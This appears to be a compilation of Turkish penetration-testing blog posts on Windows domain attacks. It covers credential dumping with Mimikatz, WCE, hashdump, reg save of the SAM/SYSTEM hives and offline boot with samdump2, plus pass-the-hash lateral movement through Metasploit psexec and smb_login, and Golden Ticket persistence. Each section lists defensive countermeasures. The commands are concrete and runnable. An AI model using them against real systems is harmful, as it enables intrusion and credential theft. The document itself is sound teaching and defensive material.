Post Exploitation: Mimikatz ve WCE ile Bellekten Parolaların Elde Edilmesi

Post Exploitation: Mimikatz ve WCE ile Bellekten Parolaların Elde Edilmesi

Günümüzde sistemlere karşı gerçekleştirilen saldırılar artmaktadır. Bunun paralelinde sızma testlerine (Penetration Test) verilen önem de gün geçtikçe artış göstermektedir. Sızma testlerinin adımlarından birisi de Microsoft ortamındaki kullanıcıların (özellikle etki alanı kullanıcılarının) hesap bilgilerinin elde edilmesidir. Son yıllarda bu bilgilerin elde edilmesi için yeni bir yöntem kullanılmaya başlanmıştır. Bu yazı, kullanıcı hesap bilgilerinin yeni bir yöntem ile nasıl ele geçirildiği konusuna değinecektir. Yeni tekniğe geçilmeden önce konu ile ilgili bazı ön bilgiler verilecektir.

Yazının devamı için bakınız:

http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-clear-text-password-from-ram-using-wce-tool/
ve
http://www.siberportal.org/red-team/windows-operating-system-penetration-tests/obtaining-clear-text-password-from-ram-using-mimikatz-tool/
ve
http://www.siberportal.org/blue-team/securing-windows-operating-system/working-principle-of-tools-wce-and-mimikatz-that-obtains-clear-text-passwords-on-windows-session/

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Post Exploitation: Golden Ticket ile Etki Alanına Sürekli ve Yetkili Erişimin Sağlanması

Kurum içine yapılan saldırılarda veya sızma testlerinde bir Domain Admin yetkisini elde eden bir saldırgan etki alanındaki (neredeyse) her bilgisayarı ele geçirmiş olur denebilir. Eğer güven (trust) ilişki varsa diğer etki alanları da tehlike altına girebilir. Bunun yanında yönetim kolaylığı olması açısından saldırıya uğrayan etki alanına dahil olan kritik sistemler de tehlikeye girebilir. Bu sebeplerle etki alanı yönetici hesaplarının korunması kurumlar için oldukça önemlidir.

Yazının devamı için bakınız:
http://www.siberportal.org/red-team/microsoft-domain-environment-penetration-tests/golden-ticket-generation-by-using-meterpreter-kiwi-extenion-and-mimikatz-tool/

http://www.siberportal.org/blue-team/securing-microsoft-domain-environment/mitigating-the-vulnerability-about-kerberos-golden-ticket/

5) Kıssada Hisse: Önlemler

Etki alanını kurum için oldukça önemlidir. Bir saldırı olması durumunda etki alanındeki kritik nesnelerin (Domain Controller makineleri, Domain Admins veya Enterprese Admins grubu üyeleri,... gibi) güven altında olması oldukça önemlidir. Etki alanını korumaya yönelik atılacak adımlar için bakınız. Ayrıca, gerçekleşen bir saldırı sonucunda kaybedilecek bazı bilgilerin (krbtgt hesabının NTLM parola özeti gibi) kurum etki alanını sürekli olarak tehlike altında bulunduracağı göz önünde bulundurulmalıdır.

Bu yazıda bahsedilen saldırıdan korunmak için gerçekleştirilebilecek işlemler için bakınız.Özetlemek gerekirse,

• Etki alanı saldırılara karşı korunmalıdır. Saldırgan etki alanında yönetici hakkına sahip olamamalıdır. Bu amaçla gerekli sıklaştırma adımları gerçekleştirilmelidir.
• Saldırı gerçekleşmişse, KRBTGT hasabının parolası iki kere sıfırlanmalıdır (resetlenmelidir). Ancak bu durumda manuel olarak başlatılması gereken bazı servislerin başlayamamasına, akıllı kart ile kimlik doğrulayan kullanıcıların yeni bilet talep ederek DC üzerinde yük oluşturmasına,... sebep olabilir. Hatta, bazı durumlarda kullancıların kimlik doğrulayamamasına, bilgisayarların etki alanından düşmesine de sebep olabilir.
• Çok etkili olmasa da 4769 olay kaydı izlenebilir.

Golden Ticket kullanarak etki alanında uzun süreli yetki sahibi olunması şeklinde özetlenebilecek bu saldırı, 2014 Ocak ayında yayınlanmış olmasına rağmen daha önce kullanılmadığı anlamına gelmemektedir. Bu sebeple, özellikle 2014 yılından itibaren, etki alanına yapılan saldırıların incelenmesi ve DC'ye yetkisiz / uygunsuz erişimlerinin elde edilip edilmediğinin tespit edilmesi, bunun sonucunda da gerekli değişikliklerin yapılması kurum etki alanını korumak için önem arz etmektedir. Özellikle kritik kurumlar için, bu kontrollerin geçmişe yönelik gerçekleştirilmesi ve gerekli müdahalelerde bulunulması gerekmektedir.

Kaynak:
http://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
http://rycon.hu/papers/goldenticket.html
https://www.christophertruncer.com/golden-ticket-generation/

Etki Alanı Saldırılarından Korunma Yolları: İmaj Yapılandırması

Etki Alanı Saldırılarından Korunma Yolları: İmaj Yapılandırması

Etki alanı sızma testlerinde gerçekleştirilen adımlardan birisi de yayılma adımıdır. Bir bilgisayardan yerel yöneticilerinin parolaları alındıktan sonra, aynı kullanıcı bilgilerini kullanan diğer bilgisayarlara giriş yapılmaya çalışılır. Bu amaçla aşağıdaki 2 yazı incelenebilir:

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-smblogin-modulu-ile-yaylabilecek.html

http://ertugrulbasaranoglu.blogspot.com.tr/2013/10/ipucu-psexec-modulu-ile-yeni.html

Bu adımlardan gerçekleştirilmesinin önüne geçilmesi için etki alanındaki bir bilgisayarda bir şekilde elde edilen yerel yönetici kullanıcı parola bilgileri kullanılarak  (özet veya açık halinin) diğer bilgisayarlara erişim sağlanamamalıdır. Bu amaçla, kurum içinde kullanılan imajlar uygun şekilde oluşturulmalı ve özelleştirilerek kullanılmalıdır.
İmaj yapılandırılması için, en az aşağıdaki ayarların uygulanması gerekmektedir.

a) İmajlar güncellenmeli ve en güncel hali ile kullanılması sağlanmalıdır. Sıkılaştırma işlemleri için güvenlik şablonları kullanılabilmektedir. Güvenlik şablonları için aşağıda belirtilen kaynaklar tercih edilebilir:

http://www.bilgiguvenligi.gov.tr/kilavuz-dokumanlar/index.phphttps://benchmarks.cisecurity.org/downloads/multiform/http://web.nvd.nist.gov/view/ncp/repository

b) Etki alanına eklenen bir bilgisayar özel bir OU altına yönlendirilmesi sağlanarak (redircmp aracıyla veya hazırlanabilecek betiklerle) bu bilgisayarlar için özel grup ilkeleri kullanılmalıdır. Böylece etki alanına eklenen bir bilgisayarın otomatik olarak sıkılaştırılması da gerçekleştirilebilir. 

c) İmajlar kullanılarak işletim sistemi kurulurken, sadece gerektiği kadar kullanıcı oluşturulması saldırı yüzeyini azaltacaktır. Yerel yönetici haklarına sahip kullanıcılar oluşturulmamalı veya kontrollü bir şekilde oluşturulmalıdır. 

d) Etki alanı saldırılarından korunma için kullanılan en temel yöntemlerden biri de tuzak kullanıcı oluşturmaktır. Bu amaçla, etki alanında kullanılan yerel ilkede üç adım gerçekleştirilebilir.

• Bilgisayardaki gömülü (built-in) yerel yönetici kullanıcısı (Administrator) devre dışı bırakılarak, adı “Test” veya “Deneme” gibi şüphe çekmeyecek şekilde güncellenir. Parolası uzun ve karmaşık verilebilir. Bu işlem grup ilkelerindeki Preferences özelliği kullanılarak aşağıdaki gibi gerçekleştirilebilir.

Gömülü Yerel Yönetici Kullanıcı Bilgilerinin Güncellenmesi

• Gerçek yerel yönetici kullanıcısının kimliği güncellendikten sonra, yerel yönetici olarak kullanıcı adı Administrator, tanımı gömülü yerel yönetici tanımı ile aynı olan ("Built-in account for administering the computer/domain") tuzak bir kullanıcı oluşturulur. Tuzak kullanıcı parolası çok uzun ve karmaşık seçilerek parolanın açık halinin elde edilmesi zorlaştırılabilir. Ayrıca bu kullanıcı devre dışı bırakılarak, saldırganın zaman kaybetmesi sağlanabilir.Bu işlem grup ilkelerindeki Preferences özelliği kullanılarak aşağıdaki gibi gerçekleştirilebilir.

Tuzak Yerel Yönetici Kullanıcısının Oluşturulması

Not: Tuzak kullanıcı yukarıdaki gibi önleyici amaçla kullanılabildiği gibi, tespit amaçlı da kullanılabilir. Bu amaçla, tuzak kullanıcı parolası kolay elde edilebilecek şekilde kısa olarak ayarlanır. Daha sonra bu hesap ile bir kez oturum açılarak hesap etkin olarak bırakılır. Bu hesap ile yapılan işlemlerin denetim kayıtları tutularak bu hesaplar ile yapılan işlemlerden anlık olarak haberdar olunması sağlanabilir. Bu yöntem kullanılırken anlık haberleşme sisteminin etkin şekilde çalıştığından emin olunmalıdır.

• Son adım olarak da, oluşturulan tuzak kullanıcı Users veya Guests gibi bir gruba üye yapılabilir ve bilgisayar üzerindeki tüm hakları alınır.

 

Oluşturulan Tuzak Yerel Yönetici Kullanıcısının Guests Grubuna Üye Yapılması

Not: Tuzak kullanıcı oluşturma oldukça yaygın kullanılan bir yöntemdir. Bu sebeple sızma testi sırasında deneyimli kişilerce veya saldırı anında deneyimli saldırganlarca kullanıcıların SID değerleri kontrol edilerek tespit edilebilir. Ayrıca tuzak kullanıcı oluşturulurken Preferences üzerinden parola atanması işlemi çok güvenilir bir yöntem değildir. Konu ile ilgili bir sunum için bakınız. Bu sebeple, yerel yönetici parolalarının yönetimi için özelleşmiş uygulamaların veya betiklerin kullanılması tavsiye edilmektedir. 

- Bazı özel uygulamalar ile hem parola değişiklikleri otomatik, birbirinden farklı, rastgele ve periyodik olarak sağlanabilmekte; hem de gerektiği süre boyunca bu parolaların hangi kullanıcı tarafından, hangi amaç için kullanıldığı takip edilebilmektedir. Bu uygulamaların kullanılması yerel kullanıcıların yönetimini kolaylaştıracaktır. 

- Yerel yöneticilerin parolasının verilmesi betikler kullanılarak da gerçekleştirilebilir. Bu amaçla, bilgisayar adının (hostname) özelleştirilerek kullanılması yerel yönetici parolalarının farklılaşmasını sağlamaktadır. Yerel yöneticilerin ve BIOS şifrelerinin otomatik / birbirinden farklı olarak ayarlanması ve merkezi olarak yönetilmesi konusu ile ilgili bir yazı Bilgi Güvenliği Kapısı'nda yayınlanmıştır.

İpucu: psexec Modülü ile Yeni Makinelerde Oturumun Açması

psexec  Modülü ile Yeni Makinelerde Oturumun Açması

Amaç
Organizasyondaki - yerel kullanıcısı ve şifresi / şifre özeti bilinen - diğer makinelerde oturum açılacaktır.

Yöntem
Bir önceki yazıda smb_login modülü ile girilebilecek bilgisayarlar tespit edilmişti. Bu adımda ise psexec modülü ile giriş denemesi yapılacaktır.
psexec modülü incelenir:

search psexec
use exploit/windows/smb/psexec
show options

psexec modülünün incelenmesi

Seçilen modül hakkında ayrıntılı bilgi elde edinilebilir:

info exploit/windows/smb/psexec

psexec modülü hakkında ayrıntılı bilginin listelenmesi

Seçenekler uygun şekilde ayarlanır:

set RHOST 192.168.172.243
set SMBPass aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUser administrator
set PAYLOAD windows/meterpreter/reverse_tcp
show options

psexec modülünün düzenlenmesi

Not: Domainde ilk olarak girdiğimiz bilgisayarda, "net share" komutu çalıştırıldığında “ADMIN$” paylaşımının açık olduğunu gördüğümüz için, SHARE seçeneğini aynen bırakabiliriz.

Modülü çalıştırmak için ve elde edilen bağlantıları listelemek için aşağıdaki komutlar kullanılır :

exploit
sessions -l

psexec modülü ile exploit işleminin gerçekleştirilmesi

Not: PsExec bir çok AV tarafından tespit edilebilmektedir. Bu sebeple, bağlantıda belirtildiği gibi WCE aracı kullanılarak da hedef sistemin dosya sistemine erişilebilir, bağlantıdaki gibi WCE & MS psexec aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir, bağlantıdaki gibi MSF psexec_command modülü kullanılarak Meterpreter komut satırı elde edilebilir, bağlantıdaki gibi Kali pth-winexe aracı kullanılarak Windows ve Meterpreter komut satırları elde edilebilir.

Not: MSF PsExec modülü çalıştırıldığında gerçekleşebilecek hatalar için bakınız.

Önlem

• Önceki adımlarda belirtilen önlemler alınmalıdır.

İpucu: smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

smb_login Modülü ile Yayılabilecek Makinelerin Belirlenmesi

Amaç

• Port taraması ile SMB (Server Message Block protokolü) dosya paylaşımını sağlayan TCP 445. portu açık olan makineler bulunacaktır.
• Elde edilen bir yerel kullanıcı hesap bilgilerinin, organizasyondaki diğer makinelerde de yetkili olup olmadığı belirlenecektir.

Yöntem
Önceki adım ile elimizde sadece bir makinede yerel yönetici hesabı dahil olmak üzere yerel kullanıcı hesaplarına ait şifrenin özeti bulunmaktadır:

Hedef makinedeki kullanıcıların şifre özetlerinin listelenmesi

Bu özet halindeki şifreyi ve Administrator (yerel yönetici) kullanıcısı kullanarak, diğer makinelere de girilmeye ve böylece organizasyondaki diğer makinelere yayılım gerçekleşecektir. Yayılım işlemi; port taraması yapıldıktan sonra veya direk olarak zafiyetle ilgili modül kullanılarak gerçekleştirilebilir.
SMB dosya paylaşım portu (TCP/445) açık olan makinelerin bulunması nmap komutu ile (veya Zenmap kullanarak) gerçekleştirilebilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open

nmap komutu ile 445. portu açık olan makinelerin tespit edilmesi

Büyük bir ağda çok uzun bir sonuç gelebileceğinden sadece IP’lerin alınmasını isteyebiliriz. Bunun için düzenli ifadeler (regex) kullanılabilir:

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep -oE '.*((25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){3}(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE '[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}\.[[:digit:]]{1,3}'

veya

nmap –Pn –sT –p 445 192.168.172.0/24 --open | grep –oE ‘[0-9]{1,3}[\.]'

nmap komutu ile 445. portu açık olan makinelerin listelenmesi

SMB dosya paylaşımı açık olan IP'ler bulunduktan sonra sadece bu makinelere sızılmaya çalışılabildiği gibi, tüm ağdaki makineler için de sızma işlemi denemesi yapılabilir.
Sızma işlemini deneyeceğimiz makinelerde, hashdump ile şifresinin özetini elde ettiğimiz yerel yönetici hesabı ile aynı şifreyi kullanan kullanıcılar araştırılır:

search smb_login
use auxiliary/scanner/smb/smb_login
show options

smb_login modülünün incelenmesi

Seçenekler uygun şekilde ayarlanır:

set BLANK_PASSWORDS false
set RHOST 192.168.172.0/24
set SMBPASS aad3b435b51404eeaad3b435b51404ee:da8aef7a322d9ecf8d1d7e220f837176
set SMBUSER administrator
set THREADS 15
set USER_AS_PASS false

smb_login modülünün düzenlenmesi

Exploit işlemi gerçekleştirilir:

exploit

SUCCESSFUL LOGIN sonucunu dönenler "administrator" kullanıcısına ait şifrenin özeti, elimizdeki özet değer ile aynı olan makinelerdir:

smb_login kontrolünde başarılı dönen sonuç örneği

Not: FAILED LOGIN sonucunu dönenler ise başarısız exploit denemeleridir:

smb_login kontrolünde başarısız dönen sonuç örneği

Not: smb_login modülü yerine hedef odaklı olarak smb_enumusers_domain modülü de kullanılabilir. Bu modülle ilgili ayrıntılı bilgi için bakınız:

http://ertugrulbasaranoglu.blogspot.com.tr/2013/11/ipucu-smbenumusersdomain-modulu-ile.html

Önlem

• Ağ üzerinde kurallar tanımlayarak; belirlenen IP’lere, belirlenen portlardan kontrollü bir şekilde izin verilmelidir.
• “administrator” gibi varsayılan yerel yönetici hesaplarının isminin değiştirilmelidir. Böylece yapılacak birçok saldırıda yerel yönetici hesabının isminin kolayca ve otomatik olarak bulunmasını zorlaştıracaktır.
• Organizasyondaki makinelerde bulunan yerel kullanıcıların şifreleri farklı ayarlanmalıdır.
• Yerel yönetici hesaplarının şifreleri,  şifre kırma saldırılarına karşı korumak amacıyla karmaşık seçilmelidir.
• Kullanılmayan ve ihtiyaç duyulmayan yerel yönetici hesapları kaldırılmalı veya devre dışı bırakılmalıdır.

İpucu: Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi

Yerel Yöneticilere Ait Şifre Özetlerinin Ele Geçirilmesi

Amaç

• Yerel kullanıcılara ait şifre özetleri elde edilecektir.

Yöntem
Önceki bir yazıda mevcut zafiyet kullanılarak hedef makineye SYSTEM olarak giriş yapılmıştır. Bu kullanıcı hakları ile SAM/SYSTEM dosya bilgileri elde edilebilir. Hedef bilgisayarın konsoluna geçilebilir.

getuid hashdump shell

Şekil: Hedef makinedeki yerel kullanıcıların şifre özetlerinin elde edilmesi ve makinenin kabuğuna geçilmesi

Hashdump ile ilgili ayrıntılı bilgi ve alınabilecek hata mesajları için bakınız.

Önlem

• Makineye SYSTEM hakları ile sızıldıktan sonra, yerel kullanıcılara ait şifre özetleri elde edilebilecektir. Bu sebeple önceki adımların gerçekleştirilememesi için önlem alınmalıdır.
• Bu adımda elde edilen yerel kullanıcılara ait şifre özetleri, diğer makinelere erişim için kullanılacağından, organizasyondaki makinelerde bulunan yerel yönetici şifrelerinin farklı olması sağlanmalıdır.

İpucu: Yerel Hesap Bilgilerinin Çevrimiçi Olarak Elde Edilmesi

İpucu: Yerel Hesap Bilgilerinin Çevrimiçi Olarak Elde Edilmesi

Yerel kullanıcıların hesap bilgileri bilgisayar kapalı halde iken harici bir aygıt (USB/ CD / DVD) kullanılarak elde edilebilir. Ayrıntılı bilgi için bakınız:

http://ertugrulbasaranoglu.blogspot.com/2012/12/ipucu-makineye-fiziksel-olarak-eriserek.html

SAM ve SYSTEM dosyaları bilgisayar açık halde iken Cain&Abel gibi bir uygulama ile de elde edilebilir. Bu işlemi gerçekleştirebilmek için bilgisayar üzerinde yönetici haklarına sahip olmak gerekmektedir.

Öncelikle Cain & Abel isimli uygulama çalıştırılır, “Cracker” sekmesine tıklanır ve “+” ikonuna tıklanır.

Şekil - 1: Cain & Abel ile Cracker Adımı

Böylece yerel kullanıcı hesap özetleri elde edilir. Bu aşamaya ait ekran görüntüsü aşağıda verilmiştir.

Şekil - 2: Cain & Abel ile Yerel Kullanıcı Hesap Özetlerinin Ele Geçirilmesi

Bu aşamadan sonra ait hesap özetleri üzerinde sağ tıklanarak export işlemi yapılır ve oluşturulan dosya notepad ile açılarak “zayifKullanici” ya ait hesap özet bilgisinin NT Hash tarafı kopyalanır.

Şekil - 3: Yerel Kullanıcı Hesap Özetlerine Ait Çıktının Elde Edilmesi

Not: Windows 7 makinelerde varsayılan olarak LM özet tutulmamaktadır. LM özeti çok daha kolay bir şekilde kırılabilmektedir.

Web üzerinde bir çok sitede online olarak NT özetleri kırılmaktadır. Bu sitelerden bir tanesi de www.md5decrypter.co.uk adresli olanıdır. Bu siteye girerek kullanıcıya ait NT Hash bilgisi aşağıdaki resimdekine benzer şekilde girilirse, kullanıcıya ait açık parola bilgisi elde edilecektir.

Şekil - 4: Kullanıcıya Ait Açık Parola Bilgisinin Web Üzerinden Elde Edilmesi

İpucu: Kayıt Defteri’nden SAM ve SYSTEM Dosyalarının Elde Edilmesi

İpucu: Kayıt Defteri’nden SAM ve SYSTEM Dosyalarının Elde Edilmesi

Bir bilgisayardaki yerel hesapların parolaları LM ve NTLM ile özetlenerek, SYSKEY adlı verilen bir anahtarla da şifrelenerek Security Accounts Manager (SAM) dosyasında (veritabanında) tutulur. SYSKEY adı verilen bu anahtar SYSTEM dosyası içerisinde bulunur. SAM ve SYSTEM dosyaları, %SystemRoot%\System32\Config dizininde saklanır. Ancak işletim sistemi çalışıyorken bu dosyalara erişimler yasaklanmıştır. Bu sebeple, yerel kullanıcıların parolalarına ait özet bilgileri, bilgisayar çevrimdışı hale getirilerek alınabilir. Bunun için, bilgisayar USB/CD ile başlatılıp,  SAM ve SYSTEM dosyaları alınır.

• http://www.bilgiguvenligi.gov.tr/donanim-guvenligi/sam-dosyasi-ve-ramdeki-bilgilerin-guvenligi-2.html
• http://ertugrulbasaranoglu.blogspot.com/2012/12/ipucu-makineye-fiziksel-olarak-eriserek.html

Bunun yanında bilgisayarda yerel yönetici hakları elde edilebilmişse, çevrimiçi yollarla da parola özetleri elde edilebilir. Cain & Abel uygulaması bu amaçla kullanılabilir.

Ayrıca, SAM ve SYSTEM dosyaları kayıt defterinden de alınabilir. Bu işlem için, komut satırı yönetici modunda açılır ve aşağıdaki 2 komut çalıştırılabilir.

• reg save HKLM\SAM "C:\Users\Yerel Yonetici\Desktop\SAM”
• reg save HKLM\SYSTEM "C:\Users\Yerel Yonetici\Desktop\SYSTEM”

Bu dosyalardaki yerel kullanıcı parolalarının özetleri Ophcrack veya Cain & Abel gibi uygulamalarla elde edilebilir.

İpucu: Makineye Fiziksel Olarak Erişerek CD/USB'den Boot Edilmesi

Makineye Fiziksel Olarak Erişerek CD/USB'den Boot Edilmesi

Amaç
BIOS koruması olmayan bir son kullanıcı makinesi, USB den çalışan bir işletim sistemi ile başlatılarak makinedeki yerel kullanıcıların şifreleri ve/veya şifrelerinin özeti elde edilecektir.

Yöntem
Son kullanıcı bilgisayarları farklı bir işletim sistemi ile açılabildiği takdirde bu bilgisayarlara ve bu bilgisayardaki verilere tam yetki ile erişim mümkün olmaktadır.
Fiziki olarak sahip olduğumuz makine - boot edilebilir bir Backtrack USB veya CD'si kullanılarak - boot edilir. Backtrack arayüzünden fiziksel makinenin hard diskine geçilir:

cd media/ ls -la cd C6FA48EAFA48D877/ ls -la

USB/CD kullanılarak boot edilen makinenin hard diskine erişilmesi

Not: Eğer boot edilen bilgisayarın disk sistemi otomatik olarak mount edilememişse, önce mount edilebilecek disk bölümleri listelenir; daha sonra da bir klasöre, C diski mount edilir. Bu işlemler aşağıdaki komutlarla gerçekleştirilebilir:

fdisk -l
mkdir /root/YeniKlasor
mount /dev/sda3 /root/YeniKlasor

Fiziksel makinenin Windows/System32/config dizininden SAM ve SYSTEM dosyaları boot edilen sistemin bir dizinine konur:

cd Windows/System32/config  cp SAM /root/Desktop  cp SYSTEM /root/Desktop

Makinenin SAM ve SYSTEM dosyalarının makinemize komut satırı ile kopyalanması

Not: Windows makineden SAM ve SYSTEM dosyalarının alınması işlemi, Windows makinenin hard diskine girilip, sürükle bırak yöntemi ile de gerçekleştirilebilirdi.

Makinenin SAM ve SYSTEM dosyalarının makinemize arayüz ile kopyalanması

SAM ve SYSTEM dosyalarından yerel kullanıcıların şifrelerinin özeti elde edilebilir:

bkhive SYSTEM SAMAnahtari samdump2 SAM SAMAnahtarı

samdump2 komutu ile yerel kullanıcı şifre özetlerinin elde edilmesi

Not: bkhive komutuna verilen SYSTEM dosyası Windows işletim sisteminden alınmıştır. bkhive komutu SYSTEM dosyasını kullanarak bir çıktı üretmekte ve sonucunu SAMAnahtari adlı yeni bir dosyaya yazmaktadır. Bu dosya ismi rastgele olarak verilebilir. Ancak samdump2 aracına SAM dosyasına ek olarak yeni dosya adının verilmesi gerekmektedir.

Böylece önce bkhive ile veritabanını çözecek key oluşturmalı sonrasında oluşturulan key samdump2 programına verilmelidir.
Not: Bu çıktı bir dosyaya kaydedilip, daha sonra kullanılabilir.

Vista öncesi Windows işletim sistemlerinde kullanıcı şifreleri varsayılan ayarlarda iki farklı özetleme algoritması ile saklanmaktadır. Bunlardan ilki ve en eskisi LM (Lan Manager) özetleme, diğeri ise NTLM özetleme algoritmasıdır. LM özetleme algoritması ciddi güvenlik zafiyetleri içermektedir ve bu yüzden güncel teknolojik imkânlar (gökkuşağı saldırısı vs.) ile çok kısa sürede kırılabilmektedir. Fakat saldıralar için sadece NT özeti yeterlidir.

Not: Bu işlemler yerine Cain&Abel, Ophcrack gibi araçlar da SAM ve SYSTEM dosyasından parolanın özeti elde edilebilir.

Not: Fiziksel olarak erişim sağlanan bir bilgisayarda SYSTEM haklarına sahip olmak için diğer bir yöntem de Yapışkan Tuşlar Hilesi adı verilen bir hiledir. Daha sonra da bağlantıdaki gibi kayıt defterinden SAM ve SYSTEM dosyaları elde edilir.

Kimlik doğrulamasını atlatmanın diğer yolları için bakınız:

http://ertugrulbasaranoglu.blogspot.com.tr/2012/11/logon-authentication-bypass-senaryolar.html

Önlem

• Makineler CD-ROM / USB yolu ile boot edilememelidir. BIOS ayarlarından CD-ROM / BIOS yolu ile boot işlemi iptal edilmelidir. Makinenin öncelikle harddisken başlaması için gerekli ayarlar yapılmalıdır. 
• BIOS ayarı yapılmaya çalışılırken şifre sorgulaması yapılmalıdır. 
• Makinelerde diskler tamamen şifrelenmelidir (Full Disk Encryption). Bu şekilde makine boot edilse bile SAM/SYSTEM dosyaları elde edilemeyecektir. 
• Makinelerde LM özetlerinin saklanmamalıdır.